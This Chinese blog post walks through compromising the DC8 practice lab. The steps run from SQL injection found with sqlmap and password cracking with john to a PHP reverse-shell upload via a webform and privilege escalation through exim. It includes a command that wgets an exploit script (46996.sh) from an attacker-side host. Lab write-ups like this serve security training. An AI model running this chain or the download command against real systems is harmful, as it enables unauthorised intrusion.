DC8靶场练习

目录

一,靶场信息

二,信息收集

三,渗透过程

四,提权


一,靶场信息


二,信息收集

1,确定目标IP

 

 

2,扫描端口

 

 

 3,漏洞扫描


三,渗透过程

访问网站页面

 

思路:当点击该页面的“welcome to DC8”字样时,发现上面的url变化为“http://192.168.86.162/?nid=1”,该页面有可能存在SQL注入漏洞。

 

 使用SQLmap进行扫描

 

查询数据库

 

 

查询该数据库下的表名

 

 

查询表中的列名

 

查询用户名和密码

 

 

 

 

使用john密码破解工具进行破解

 进行登录

 

在contact us>webform>form settings中发现可以上传PHP代码,上传一个反弹shell的代码

 

 

 

 开启监听之后,在contact us中提交一个留言来反弹shell

 

 


四,提权

 

查看exim版本

 

 

 

 

cd /tmp
wget 192.168.86.130:8888/46996.sh

接着运行该文件,发现还是没法运行

原因:这个报错是由于windows系统下编辑然后上传到Linux系统执行导致的。

解决方案:本地编辑查看文件类型:set ff=unix

 

完了记得:wq保存。

再次上传

 

 

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值